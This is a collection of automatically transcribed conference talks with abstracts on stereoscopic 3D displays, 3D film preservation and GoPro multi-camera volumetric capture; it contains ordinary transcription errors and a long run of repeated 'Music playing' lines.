But if you put a projector into this optimized center of projection, this will be visible to a viewer in front. We compare both screens by putting just a checkerboard behind the screen and taking a photograph in front and compared to the ground truth without any screen. And what you can see here is that the isotropic screen has a little bit less contrast which is due to that all environment light, even ambient light will be scattered by the screen. The anisotropic is a little bit better in terms of contrast because it only selectively diffuses light coming from the projector itself. We also compare both screens to passive and active glasses to be used together with those. You will find the complete summary and also this table in our paper. Something I want to highlight here is the light inefficiency of the anisotropic screen. The problem is that the first order diffraction will just pass us through directly and won't be diffused and won't be redirected as illustrated in the figure. So there is a huge light loss. Anyway we have chosen for our project the anisotropic glass in combination with passive glasses because first of all we like the nice contrast and the nice image quality of the anisotropic screen and for the passive glasses it's just convenient because they are cheap and we can just hand them out to possible viewers. So now about rendering content, it has already been mentioned in the two talks before. If you don't have any motion parallax, if you render something and you move your head and don't adapt the rendering then you will see a shift in the rendered object behind. This will get worse with transparent screens because with transparent screens you have the reality, the surrounding reality as a reference point. So you will notice this shift if you don't have motion parallax even more with those screens. So if you just render the same content for a Novel View point you will see that the star in this sample will shift as indicated by the red line but what we rather want to have is a re-rendering, so an offset in the image plane of this star such that it is perceived to not move at all. In our system we use the Kinect head tracker to get an estimate of the viewer position. Now the problem with the Kinect and other head tracking systems is the frame rate as well as the latency. Why is that? Imagine that you have an update from the head tracker and you render the corresponding frame then you start moving your head, the virtual object will shift until you get the next update, 33 milliseconds later in the case of Kinect and then this object will jump back. So you get a wiggling of the object if you move your head and this destroys the motion parallax, the feeling, the immersive feeling of motion parallax. So how worse is it? Let's compute through an example with delta t just 33 milliseconds. We assume a viewer motion of 1 meter per second which makes up for offset of 3.3 centimeters between two frames coming from the Kinect. In our setup we just assume equal distance between screen and viewer and screen and virtual object so there is no amplification and this 3.3 centimeters directly translates to the virtual object. And 3.3 centimeters is not too much but it's already enough to destroy the immersive feeling of motion parallax. So we need to do something more clever both about the frame rate, 33 milliseconds and even worse for the latency which is 125 milliseconds for the Kinect. 
And here we borrow some insights from control engineering as we already heard in the first talk which is called Kalman filtering. And a Kalman filtering is basically a fusion of a physical model and an observation. And in our case we just model the head according to the laws of motion so our state vector is a position s and the velocity s prime and we update the position according to the velocity times the time step. The Kalman filter itself is an execution in two steps so we have first prediction according to our model and then as soon as we get input from the Kinect we correct our prediction to get better state according to reality. And this is a very basic view on Kalman filtering. Kalman filtering is much more complex so it's also very interesting and I want to recommend if you are interested to read related work about Kalman filtering. For us here it's just most important that the Kalman filter can be used to super sample this discrete signal that we get from the Kinect to create an arbitrary smooth curve as well as we can do a prediction. Prediction is good to get along with the latency of the Kinect. So what do I mean with that? Let's have a look at this plot you see on one axis the time and on the other axis the position of the head so it's a motion like from the head to the left to the right and back to the middle again. The black dots is the sampling signal of the Kinect and the black line through these dots is what you get by purely filtering so we can at least account for this 33 milliseconds which correspond to the frame rate by smoothly interpolating which the Kalman filter does itself already but also we can predict the signal. An ideal prediction of the signal would be just a shifted replica to the left in this plot and you can already see like on the orange line that it pretty works very well but on the green line you will see you will notice an overshoot on the top and also on the bottom where the green curve takes some values which are lower than the black line. So what it means for reality is that when you move your head that the predicted curve things your head is further gone further than you really did and this is again a problem because this overshoot destroys again the immersion. So with this prediction we have to be careful. We have to predict to account for the latency but if you predict too much then we get problems at the end of the motion and you need to find a good balance and in our case we found that half the latency of the Kinect was a good balance between these two errors. So the system that we propose consists of an anisotropic glass which you can see in front with the rendered Ironman on top of it. We use two projectors with linear polarizers in front with cross polarized axis and the viewer is required to wear corresponding linear polarizing glasses. You also see the Kinect in the front and in this image we didn't use any polarizer in front of the camera which captured this image so you see the double image of the Ironman. Calibration is very simple we just project checkerboards in both projectors and we compute the homographies between projector coordinates and display coordinates and to the rectification according to that. Another something I want to highlight is that all components are off-shelf so you really can take our paper look up the references by the components and assemble the display at home and you should really try it out because it's a very immersive feeling that you get. So the visitors of our lab liked it a lot. 
We think mostly it comes from the transparency as I mentioned you get like this reference points from the reality from the surrounding and also because it's a good accommodation queues and then overlaid with this the virtual reality which has still the ghosting effect which will probably be overcome by Quinn's inventions he just presented before. But also the light white glasses and the motion parallax add like the immersive to the immersive feeling and people walked around and could see Ironman from all sides. Supported is also the true size of Ironman he really is life size and you really get the feeling as if he's standing behind the glass panel. The problem however if you move faster then you get this overshoot and you lose this immersion and it looks like a rendering again. So as a conclusion we are approaching we are not completely there yet but with the next generation of head tracking which have higher frame rates and also low latency we can apply the same technique and we will get a good motion parallax and good immersion into this autostereoscopic content. With this I want to conclude I want to thank you for your attention and maybe there's time for some questions.
|
Augmented reality has become important to our society as it can enrich the actual world with virtual information. Transparent screens offer one possibility to overlay rendered scenes with the environment, acting both as display and window. In this work, we review existing transparent back-projection screens for the use with active and passive stereo. Advantages and limitations are described and, based on these insights, a passive stereoscopic system using an anisotropic back-projection foil is proposed. To increase realism, we adapt rendered content to the viewer's position using a Kinect tracking system, which adds motion parallax to the binocular cues. A technique well known in control engineering is used to decrease latency and increase frequency of the tracker. Our transparent stereoscopic display prototype provides immersive viewing experience and is suitable for many augmented reality applications. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32379 (DOI)
|
Hello. So my name is Jeff Joseph and for 20 years from 1989 to 2009 I ran Cebukat Productions down in Palmdale. We started out as a film broker. I was buying and selling film prints to collectors and archives and we kind of morphed into a stock footage house. We had 50,000 trailers. That was our specialty, coming attraction trailers. And then we wound up having the largest stereoscopic 3D collection in the world also. I purchased from Bob Furmanack who had started the 3D archive years earlier. I purchased his collection and then we added to it over the years. And so we were able to do 3D expos at the Egyptian Theater in Hollywood in 2003, 2006 and last September we did the last one, which definitely will be the last one because film was pretty much dying and it's getting harder and harder to run 35 millimeter dual interlock pretty much anywhere. When I approached the American Cinematheque and the Academy and UCLA about doing a 3D expo back in 1953, back in 2003 rather, 50th anniversary from 1953, they had two major objections to doing it. One was it would cost too much and we would never recoup our costs, which turned out to be really true. And the other problem was there weren't any prints, other than like House of Wax and a couple of others, the studios didn't really have much. But between the material I bought from Bob Furmanack and then the material that Grover Crisp at Sony was incredibly generous. He printed up the nine Sony features, fourth Columbia features and the shorts. We were able to do the expo in 2003 and then in the gap between the two we managed to find a bunch of other stuff. And I'm going to talk to you about some of those. Okay, there we go. Those are the 50 movies from the Golden Age, starting in Buona Devo and ending with Revenge of the Creature. 3D didn't really last too long in the 50s, a little bit over a year. By the time September of 1953 rolled around, a Cinemascope hit. The robe opened at Grumman's Chinese in September of that year and kind of was the final nail in the coffin to 3D. It was much easier for theaters to run Cinemascope than it was to run Dual Interlock 3D. And there were still some things in the pipeline at that point, so there were some releases in 54 and 55, but it was pretty much over within about a year. We ran 43 of these movies between the three expos. Just because we ran them doesn't mean they're necessarily preserved. I mean, the studio titles tend to be the House of Waxes, for example, but I, the jury, for example, only exists as the print that we ran. And that's it. There's no negative, there's no nothing. We did not run these seven movies, and this is basically the reason why. As you can see, Bounty Hunter and the Command were not even sure we're finished in 3D. They were shot that way, but by the time they were finishing them, 3D had pretty much died. Films would have to probably spend some money to make them releasable. The RKO titles are in terrible condition. Louisiana Territory may not even exist at all. At the last expo in 2000, rather last year, less September, we ran 12 minutes of footage of Louisiana Territory that we found in 3D, and that may be all that exists on the movie at all. Of the movies we didn't run, the only one that we could have run was The Moonlighter. It is a perfectly well-preserved film, but Warner's wouldn't make a print for us, unfortunately. Son of Sinbad never got a 3D release. Southwest Passage did get a 3D release, but as you can see, only one and a half negatives exist. 
The other half of One Eye has vanished. We found half of it in an Italian lab, but the rest seems to be gone. Top Banana is pretty much a lost film, totally. There's just nothing left on it except two prints of One Eye. We found paperwork from 1956 that the company that made it went bankrupt and had a bankruptcy auction. My thought is that whoever bought the material at the bankruptcy auction wound up with it, but there's really no way to track it back, unfortunately. I wanted to talk to you mostly, though. Oh, also, I should mention that of the shorts, there's only one that hasn't surfaced yet, and that's Bandit Island. We found all the other shorts. There are 10 foreign or rather non-English language features, none of which we ran, one of which has been preserved in Italian one, but they wouldn't let us run it, unfortunately. They didn't have a DCP of it. I mostly wanted to talk to you about some of the pre-Golden Age material that we found. As mentioned, there's been 3D since 1915. None of that has managed to survive. However, what has managed to survive is some material from the 20s. The early-est material, and we're going to run some of this, so that's why I'm talking to you about it. The earliest surviving 3D is something called Plasticon. Let me find it in my notes here real quickly. It's called Kelly's Plasticon Pictures. It was shot in Prismacolor by William Van Doren Kelly, one of the 3D pioneers. He was also a pioneer in color photography. What this piece is, it's kind of a demo film, really. It had a—there was—late 1922, it was released as something called Washington Through the Trees. This clip you're going to see has about four or five minutes of that, and then four or five minutes of other footage, which we believe was a second short called Movies of the Future. Since that movie doesn't exist, we can't be sure of that. We think this reel was put together for demonstration purposes to sell the process. Another thing that we're running is—we're labeling it Crespinel footage because that's what George E. Eesman House calls it. Again, it's a reel of nitrate that they were given by the family of William Crespinel. It was shot by Jacob Leventhal and Frederick Ives. Again, we think these are scenes that were kind of cut together as a demo reel. Pathé released several shorts in the 1920s. We think these—we think this footage is from those shorts, but we can't be sure because the shorts don't exist. I want to tell you a story about one of the shorts that we found called A Day in the Country. This is one of the Robert L. Lippert shorts. There were three, Bandit Island and College Capers were the other two. All three had vanished. When the Lippert Library was sold in the 1950s, the person who bought the library deliberately didn't take the shorts. In fact, they said they just didn't want them, so they were all thrown away. All the negatives, all the fine grains, all of it was trashed. With the shorts surface, it's going to have to be in release prints. Well, back when I was dealing film, I would get cold calls from people trying to sell me stuff. I got a call from this fellow named Fred back east. This was about, oh, I think, 10, 12 years ago. He read me a list of film, and it was pretty boring. Then he says, A Day in the Country. I said, Hold it, A Day in the Country? He said, Yeah, I think it's in 3D, anagolith. It's a real faded print. I said, Yeah, I might be interested in that. How much you want? 
Well, he wanted $300 for it, which was an awful lot of money for a faded Eastman color short. But still, if it's the only one in existence, I didn't blink an eye. I pay pal in the $300, and he vanished. In all the years I was dealing film, that rarely happened, but I rarely got screwed on a deal. But he just vanished. His phone was disconnected. I didn't get the reel. Needless to say, I was unhappy. A friend of mine is a private eye, and I asked him to help me find Fred. Over the next several years, we tracked him. He had serious financial issues that turned out. We found tax liens and all sorts of stuff going on. Finally, in 2006, just before we started working on Expo 2, I thought, Let's give it one more try. This time, I actually got Fred on the phone. He apologized and said he didn't have the money to send me. I said, I don't really want the money. I want the film. He said, Well, I've got some bad news about that. You know that I had a pickup truck and the little place behind the front seat, I had it stuffed back there, and my truck was towed because I didn't pay the payments on it, and I don't know what happened to it. I said, Do you know where it was towed to? He gave me the name of the towing company. I tracked it to there. I called them. This woman answered the phone. I explained what had happened. She put the phone down. I hear this paperwork. I hear a door slam a few minutes later. She comes back and she says, There's this can here, and it's got some film in it. It says a day in the country. Is that what you mean? Yeah, that's what I mean. She charged me another $300 for storage fees, which I paid. I gave her my FedEx number. She FedExed it. I was expecting it the next day. When you know it, there was a big storm back east and FedEx was late. I didn't get my FedEx package that day either. One more day it came, and by goodness there it was, a day in the country. Beautiful condition print. Although it was completely faded, he was right about that. He also had said something rather strange to me. He said that it can't be from 1953. It's got to be from the late 30s, early 40s, because he had run it years ago, and he said that's what it looked like. I said, No, no, no, we know about this. It's from 1953. We have the advertisements and so on. He said, Well, whatever. I got the reel. We took it down to a lab in Burbank, and the late Dan Sims and I transferred it in various different ways. We have hot rod of the equipment to try and extract the left eye and right eye out of this really faded anaglyph print. Then Dan took those two files and he massaged them even further, and we outputted them back to a left eye and right eye stereopair. By God, it worked. There's a little bit of shadowing and ghosting on one eye, but it's not bad at all. I think you'll be very pleased with it. It was the only way to save it after all. I suspect with technology today, we probably could do a little bit better job now. But we did this in 2006. I think it came out pretty good. Another thing we found, I think I talked about the Crespanel reel. The Plasticon is also extracted off a nitrate print, by the way. Plasticon was a 10 minute nitrate reel that again we took to the lab and we extracted the left eye and right eye of. Last thing I want to show you on the reel is something that we call the Norling footage. 
What it was was John Norling shot some test footage in the 1930s and it wound up being sold to MGM to make audioscopics and new audioscopics, which again were only run anaglifically, never as a left eye right eye pair. But how I got that, these little clips, was a little bit interesting. In 1982, a documentary was being made on the history of 3D called the 3D Movie. It was going to be directed by Leonard Schrader, the brother of Paul Schrader, and produced by Lee Parker and Dean Burko. They had Japanese funding. Don't forget, the early 80s was one of the high points of 3D of Overunder StereoVision 3D. They spent a million and a half dollars doing this documentary, acquiring all these wonderful elements and rare materials. They even had a printstruck and for whatever reason the financing fell through at the last minute and the movie did not get finished. It was kind of a sore point with Leonard Schrader. I spoke to him about this years later and he was pretty upset about it, even as I say, 20 years later after the fact. The story had been that that one print that was struck was under his bed, but he would not confirm that. We did still, what happened was, a storage facility I worked with had a deal with me to call me whenever someone didn't pay their storage bill on film. He called me and said there was 300 boxes of things that were labeled 3D Movie. Do I want them? Yeah, I do. I went down there and I picked the stuff up and that's where this knorling footage came from, where they got it from, I do not know. We found all sorts of interesting stuff there, including some Overunder converted footage from Son of Sinbad, which indicates that in the early 80s, somebody had a left eye and right eye negative of Son of Sinbad, which has since vanished. That few minutes of footage that we had from that may be that all that will ever surface in 3D of Son of Sinbad. I want to run this reel for you and then I'm going to take some questions. Make sure you have your glasses, please. Let's go from there. Let's give it a go. Thanks. Lights, please. Yes, dim the lights, please. Yes, dim the lights, please. Come on in, butch. Get a load of this. Whoops! I bet you thought there was an accident. A smith of mighty man is he, but just between us folks. He's muscle bound above the years. Oh, that's crops! Pick up that beard, we know you. What a character. Far shoes he gives them. Nah, that's for sissy. Yeah, but wait a minute. They got an idea. What a buildup. Imagine what they can do with a pool cue. William Tell had nothing on him. You just know what's going to happen. Oh, I can't look. Now all he needs is a horses tail. Here they are, the cats and jammer kids. Just out for an innocent walk in the country. Say, I might want to like this country life. Oh, come on now, girls. That tickles. Oh, stop! Another one. All right, all right. So you got six more veils. Come on, we're running out of film. Come on, kids, get out of here now and I'll stop that. Here's the girls a chance. We want the girls. Come on in. The water is fine. Hey, just remember, the kids swim. What is this magic at a time like this? The guys will never learn. Exactly. Made a funny. Made a funny. This is no one seeing eye to eye. I'll bet he doesn't eat scramble eggs for a long time. What's so rare as a day in June? Blue skies, trees, apples, inspiration, and what a panorama. That reminds me, what happened to those dancing girls? Oh, the rober boys. Inspiration moves them, maestro. Hey, look out for that brush. 
Just a few more depth strokes of the brush and another mass of piece will be ready for the ash can. Eh, never touch me. A little clean fun and a quick getaway. They can't do that to you, rimbant. Honest, mama. We were just walking along and minding our own business when this think runs up behind us with a big brush. They're here again. That's right, honey. Keep pissable. Confidentially, do you use that green stuff? Everything is all set here and they go right into the arms of Picklepuss. Get away from us, you pest. Eh, you miss me. You've been waiting for this. That was a farmer's daughter. Ah, they're going to make dairy, huh? Folks, this is going to be a tight squeeze. It's efficiency. That's what it is, direct from the manufacturers to you. Ladies and gentlemen, the motor car of the future. Think it'll work? Hey, come back here. All we need is pictures of hitchhiker. Some fun. Wow, watch that pickup. That was a beaut. And a sea biscuit by a nose. One side of the leg off. Look out. Now grab the wheels. Hey, Seth, watch it. Wow, that hurts. Ah, shut up. Hey, Mom. That figure is coming to no good end. I think it's like 10 more minutes to go. While he's getting that ready, I should note that the day in the country was shot in 1941 in New Jersey. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. This is the oldest surviving 3D footage you're about to see. And there's a bit in here of animation. And there's a bit of a known animation as well. Music playing. We're about to see something called a blinky, which is, they'll explain what it is in a bit. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing.
|
3D movies have a long history dating as far back as 1915. Jeff will provide an overview and preservation status of the 1950’s “Golden Age” 3D movies plus several “pre Golden Age” 3D content examples. Through Jeff’s keen interest in early 3D movies and all forms of early film content, he has been instrumental in locating, restoring, preserving and exhibiting many early 3D film titles. Jeff has many interesting and unusual stories to tell of how he helped locate and recover several early 3D movies. The onward march of time, and the ever faster changes in technology now present many challenges for the preservation of early 3D film content, but also offer new opportunities. The rapid replacement of 35mm film projection with digital projection is a key part of this change. Jeff will reflect on the three 3D Movie Expos that he has run in Hollywood which have allowed the public to experience these historical 3D movies once again.
|
10.5446/32229 (DOI)
|
The next talk is 3-way with back but not as we know it. So the author is Mr. Tim MacMillan. Yes. From GoPro. Thank you. Hi everybody, Tim MacMillan. So this is going to be a little bit different to what you've been looking at already. I'm from GoPro. Obviously, you know, I hope you know who GoPro is. We manufacture small but very high quality, very powerful, generally called sports cameras. And I joined GoPro four years ago. I don't know if they quite knew why they hired me but they put me in a department, which is the Department of One, which was me, called Multicamera. And what I was working on was ways of getting GoPro's to work in concert. So Multicamera means you don't use one camera, use two, four, six, twelve, ten, you know, any number. But there are certain things you have to do to make them work together. Because we understood that there is, there are new technologies coming which will require capture from multiple cameras, not just single monocular views but multiple views. And this includes everything from stereo to light field. So I'm going to talk a little bit about that. So, so I did a little bit of a historical context. I've been working in the multicamera field for 30 years building camera arrays. I just wanted to show that cameras have been around since before cinema, before video. This is Edward Mybridge back in the 1870s. And over there was a French photographer called Nadar who did what was called sculptural photography, which was basically, I think it was 12 or 24 cameras with synchronized exposures. So they could capture somebody sitting there and then use those photographs to create a sculpture. It would have to be carved by hand, but there we are. And jump to the present day. Here we are. And you see, we're still doing the same thing. We have the linear progressive arrays, like made famous by the matrix and stuff like that. And we have something new appearing now, which is a volumetric capture. And hang on to that right-hand image. I'll show you something in a bit. So what is volumetric capture? So yes, it could be one of many things at the moment. So this is an example of a 5 gigapixel volumetric capture. This is just a single frozen moment. The motion is actually the motion of the virtual camera. And what we have here is a volumetric capture and then creation of a virtual camera movement in Z-space in front of the camera array. So the cameras were all positioned away from the high jumper. But for the actual production shot, we're able to in Z-space move the camera in towards the subject to put the camera essentially where you could never put a camera. This is one of the amazing powers of camera array and computational imaging. So the technique we're using in this is basically photogrammetry, where we, and it's pure image based photogrammetry. We're not using any time of flight, laser, or any other kind of depth sensing. This is all done from computational imaging. And this capture, like I said, was 5 gigapixels. And you could have actually pushed the camera in further until you see the pores of her skin. There's that much detail in this. And every single strand of hair is clearly defined as well. But 50 gigapixels is a lot of data. And I'm sure this took several days to render. But this was the last Olympics, so a while back. So Z-space is easy to understand. You have a camera array, which could be doing photogrammetry, could be there for light field, could be there for like a matrix style thing. We just go frame by frame along. 
But because you've got the light rays coming into each camera, you can choose any position in front of there. And you'll have all the data from these cameras here. You'll have the data to create the image viewed from the Z-space camera. So this is quite a dense linear array, much denser than is practical in reality. The other thing to talk about is resolution threshold. Because as you move your camera in Z-space away from your array, you're going to lose resolution as well. But what we can do is use optical flow and some techniques of interpolation to actually bring the resolution back a bit. The downside of photogrammetry is that you have to render a 3D object and then refilm it. So it's a kind of two-step process to produce the image. And this works equally well for stereoscopic output. And in fact, about 10 years ago, the company... I'm with GoPro. I'm also CEO of Time Slice Films, which is a company that specializes in camera array. We actually did some work for some 3D stereo movies. One was Street Dance, I think. Kind of hip hop Street Dance movie. But we actually were able to generate very convincing Z-space camera in 3D stereo. Because as you change your convergence, you can just interpolate back... You project back onto your original array here and you can generate... You have all your data there to generate not only your position in Z, but also your convergence as well. So that was very exciting. But like I said, that's kind of old stuff. So that's an example of a linear array, maybe a moderately dense array. We have now emerging a new type. Obviously, you've seen a lot of interest recently in spherical cameras. A lot of companies are trying to produce spherical cameras to produce new virtual augmented reality. But there's issues with that. Not least of which is you immediately see how low your pixel density is going to be. You're having to cover a much wider field with fewer cameras. So there are issues there. So there's a lot of people kind of working on ideas for this. I thought I'd show this slide. This is a slide that Paul DeBevec at USC put up last year. We had a visual effects society light field conference. The first light field conference held at Paul's lab at USC. And Leitrow were there trying to plug their new rebirth as an augmented reality company. But Paul said, why use Leitrow sensors when you can just put a bunch of go-pros in a ball? It's much simpler and probably much cheaper as well. But he calculated that basically you need a shed load of cameras. I think in America they might say a shit ton of cameras to do this. Again, there is a resolution threshold here. For these algorithms to work, you have to have enough resolution. So this is a huge problem when it comes to capture. And then you have to encode that somehow. And then you have to share it. How do you share something like that? And then how do you view it? Well, how do you view it is partly your problem. But there's a lot of unanswered questions at the minute. So the thing is, where do we start with all this? And good old GoPro is actually quietly kind of tiptoeing into this field. So this is the Odyssey camera. This is a rig, an array, which GoPro is bringing out this year. We're actually releasing this this year. And this was in conjunction with GoPro's Jump project. So the Jump project is, are you familiar with Google Cardboard? It's a small viewer, a stereoscopic viewer for your phone. They want to put those in schools all over the world and create a library of content that school children can see. 
So someone in Africa can see what an iceberg looks like. And someone in Italy can see what it looks like in San Francisco and yada yada, you know, all that stuff. And they needed a rig to do that. And they figured they needed 16 cameras in a ring. But the interesting thing is, this is the first kind of computational imaging device, multi-camera computational imaging device that is actually going to be on the market and people out there using it. And I know that a lot of people are going to use this for other things than doing the Google Jump pictures. And the image this kicks out, you know, the image that Google produces for this is really quite huge. It's an 8K over under. I've written that equirectangular. It's not, I think, it's a square. It's an 8K by 8K square with two 4K by 8K windows of over under with the panoramic scene. So it's not a full sphere. It's a panorama. It's a 120 degrees vertical field of view. And what you do with this, you go out, you shoot stuff, you acquire the content on the cards, you upload it to the Google Cloud, the huge black box that is floating in the sky, that is Google's processing engine, and eventually they send you back your finished stereo 3D video. So that's what I'm calling the divergent array. So that's where we're working at the moment to produce content for divergent array. There's another type of array, again, which is beginning to appear, the convergent array. This gives us a very dense pixel map. This is interesting because this enables it to actually more easily create useful content using computational processes. It gives us the maximum chance of locating voxels. I'm sure you know what voxels are, they're pixels with volumetric pixels. This type of array is scalable. You could generate and create an array to do something on your tabletop, or it could encompass the whole stadium. You see various people. There was the iVision during the Super Bowl recently, where they had like a 30 cameras around the roof of the Super Bowl stadium, and they're able to do some sort of frozen time moves, camera moves around that. But obviously, the smaller the volume you're capturing, the higher the resolution you can capture at the course of this resolution issue to do with distance. We have a choice of outputs, light field, photogrammetric, optical flow. But actually, the photogrammetry pipelines are now beginning to come to maturity. This is a little test we did at Time Slice recently. I'm going to just come out of that and go into this so that I can show you this. Oops. A little bit difficult to... Oops, I've disappeared. Come back, come back. Let me just stop. Let me just go to another one. If in doubt, have a spare one. Here we are. All right. There's some weird lag going on with this. It's both laggy and hypersensitive. All right. So this is just 30 frames of me, but this is a volumetric image. We call it volumetric video. We can call it free viewpoint media, or we can call it 4D video. I mean, all those names are being sort of banded around at the moment. This is actually... This is going to go live on Facebook tomorrow, I believe. Let me just pause that and see if I can just get a little bit closer. Come on. That'll do. That'll do. All right. So this is... So the render engine for this is polygon-based. It's not a light field. It's not a point cloud. Although those types of engines are coming. The trouble there is that there are no capture pipelines or processing pipelines for light field yet, but CloudPoint will be coming quite soon. 
And now we're going to flip back to our talk. Please. Yes. Sometimes it just works. There we are. So the thing about volumetric capture... Volumetric capture is, I think, going to be crucial to the evolution of both still and moving image. And it fundamentally changes visual content creation from a fixed viewpoint to a free viewpoint. And this is going to have a lot of ramifications in terms of how people want to view images. And I guess this is... I'll get to this point at the end, but it's going to affect you guys a lot. Right. So... Okay. So how will this become mainstream? Here's a couple of screenshots from Microsoft's last PR video about HoloLens. And what they're showing is this 4D video, this free viewpoint content, the volumetric video. And they're kind of hedging their bets. In their PR stuff, they have both a screen that you could... With your HoloLens, you can put anywhere you like. And if the content allows it, that could be 3D stereo, or it could be 2D. Or the choice could be yours. Or if the content is this free viewpoint type content, then instead of watching a 2D or a 3D stereo display, you can watch a volumetric display. So you take your football match and you put it on your table and you watch it, as if you were in the audience. And nothing that, you can watch it as if you're in the audience or as if you're in the field with the players. You can have put your viewpoint anywhere you like. So there are other issues to do with this as well. I know this from the research we're doing with spherical cameras, is that there are huge problems to do with if you have a spherical view and you've got a HMD, and you're stuck in the nodal point of the sphere. So when you move your head, the whole world moves with you. This is very bad. It's very bad for your brain and your nausea and everything else. It causes huge issues. So people that are working in AR and VR and everything else desperately need some volumetric ability to move within a volume. And hence, Lightfield now beginning to appear as a capture process. And there's another more important reason why image capture will have depth information, which is that it's not just about looking at it, it's not just about consuming it. It's also the fact that depth information will be incredibly useful and maybe the primary driver for depth information in imaging. Because the depth information can be used in Google's 3D map of the world in Streetview. And if you're looking at kind of second screen content, you can use the depth information from cameras within the stadium at the time to generate the 3D model of the stadium. So I would say that we're replacing cinematic language of vicarious experience with a first person view. I'd ask you guys to think about, will people really want to look at stereo 3D monitors if you can look at it as a volume? I look at the history of 3D and I see this, it's been hampered by the constraints of the monitor. And there's been a lot of research into why the stereo 3D market crashed in the consumer space. It still lives on in the cinema space. But here we've got capture coming with the power to give you a 3D, a volumetric object, a video object, which maybe, I'm not saying it will be, I'm saying it's a good chance that may be actually more compelling than a 3D monitor. But people haven't learned how to work with this content yet. You see the attempts people have to take a spherical camera, put it in a concert and expect it to be immersive. It's not immersive. I'm sitting there looking around. 
I can't move my head. My head's fixed and I can't move around. When people are able to move around within the concert and experience it for themselves, their own kind of exploration of that environment, then it will be interesting. So it's going to change from something which is preordained. This is a screen. It's edited. This is what you're going to see. We're going to lead you on a journey to a journey which is self-generated. But the good news is that in terms of 3D monitors, the content will hopefully be inherently 3D. You'll be able to present it as 3D stereo or light field or point cloud, whatever you like. Okay. That's it. I'll end with 16 is the magic number. Any idea why 16 is the magic number? What can you do with 16 cameras other than a circle? Any ideas? Like 2 by 8 or 4 by 4. There are many other configurations you can put these cameras in. So people have been very interested in this array because they can reconfigure it to start experimenting with light field arrays and stuff like that. So that's it. Thank you. Okay. Thank you. Thank you. Thank you.
|
GoPro launched the “DualHero 2.0” stereo rig in 2014. This offered amazing sync ability (pixel level), low cost and high resolution (17:9 2.7K@30p which looks amazing when viewed on a 4K 3D monitor). But the consumer stereo 3D market had already crashed. 3D continues to be a strong attraction at the cinema because the viewing experience is carefully controlled. This same challenge is now plainly visible in the emerging VR, AR and MR technologies, but there are really compelling reasons why 3D, either as stereo output or depthmap will play an essential role in the coming video technologies. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32231 (DOI)
|
So I'm Hidekake from the University of Tsukuba, and this is a joint work with my student, Shute Ishizuka. So the title of my talk is High Resolution Area 3D Display Using a Directional Backlight. So the contents is like this. First, I'm going to talk about the background of this research. So I'm working with medical doctors, surgeons, and of course 3D. Medicine is one of the promising areas for application of 3D. And the highest priority for medical doctors for 3D or the imaging is resolution. So high resolution is the highest priority. But another, well, merit of 3D for medical purpose is direct manipulation style. What is direct manipulation is, you know, for example, when we think of surgery simulator, here's part of the brain or any part of the body. And for surgery simulation or rehearsal, the operator can touch and manipulate, as if he's touching with his hand directly. So this is direct manipulation. So this kind of style is very good for training or rehearsal of surgery. So to do that, one option is 3D aerial display. So this is the work. Oops. Can I play the video? Okay. Thank you. So this is our work about 16 years ago. So the image is floating here. Oh, sorry. And I presented this system in SeaGraph 2000. It's about 16 years ago. And how it works is like this. So here's a pair of lenses. And with the lenses, the real image of this screen is generated in here. So when the viewer looks at the image, it's floating. So the eye's focus is fixed here. So it's very easy to recognize something is in here. And only with that configuration, just a plane is floating. So to show depth, we have to do a certain amount of parallax, binomial parallax, to do that. So actually we can do that without forcing the viewer to wear glasses. Because of the lenses, the light rays impinging on the right eye once gathers here. And the light impinging on the left eye once gathers here. So if we place a filter here, for example, in the system we constructed 16 years ago, we showed images with two different polarization on the screen. And we set a pair of polarization filters with two different polarization. Then the image, two different images can be shown to the left eye and the right eye. Of course, when the viewer's position changes, these points also change. So we have to track the position of the viewer. And by moving the filter in accordance with the viewer's position, then we can keep on showing two different images to the right eye and the left eye of the viewer. And to show the right image to the right eye and the left eye, for example, to show a triangle here and make it stable, we calculate the optical rays like this. So to show point A in the air, we prolong the line segment between the eye and point A and calculate the refraction of the lens. And we show the pixel of A here on the screen. And we do the same thing for the left eye here. And we do that for all the pixels. And of course, this calculation changes when the viewer's position changes. So we can keep on tracking the viewer's position and we can keep on calculating to show the stable image in the air. And of course, the lens includes aberration or distortion. So on the screen, we show the image distorted in the reverse direction like this. Then from the viewer's position, the right cubic can be observed. Of course, this way of distortion changes when the viewer's position changes. So when the viewer moves sideways, then we show the image like this on the screen. And from the viewer's position, the right image can be observed like this. 
So the problem of this system, actually, I made the first system 16 years ago, but it was not commercialized. So the main problem is the physical motion of the filter. For demonstration, it's okay, but for practical use, it's not very good to present a system with a physical motion. And there have been some solutions to do away with the physical motion filters. One is to use electronic filters. And actually, I also made a kind of prototype system. But with only one layer of electronic filter, we can move in the horizontal direction or in the vertical direction, but we can't move in the depth direction. If we place multiple layers of filters, then the viewer can move forward and backward. But if we place multiple shutters, then the image becomes very dark. So it's not practical. So to solve this problem, we use directional backlight in place of mobile filters or electronic filters. So this is the Notosruss-Sorg display using directional backlight. Actually, we presented the system based on these optics last year in this conference. So in this system, these are the lenses. And we keep the distance between the backlight and the lens the same as the focal length of the elemental lenses. Then the light is collimated so we can realize directional backlight to the right eye and to the left eye. So here to show the image only to the right eye, here we show the right eye image. And we just extend the line from the eye to the center of the elemental lenses and we make these parts bright for this person and make these parts bright for this person. And then both of the viewers can see the image here only with the right eye and not from the left eye. And for the left eye, we make these parts bright. So this is also connecting the eye and the center of the lens. And then only from the left eye, the left eye image can be observed. So by alternating between these two modes, we can achieve time division multiplexed auto-Australia display. But not only with this configuration, the image observed is like this. Because we are using lens array, the seam of the lens is quite distinct and annoying. And also we are enlarging the 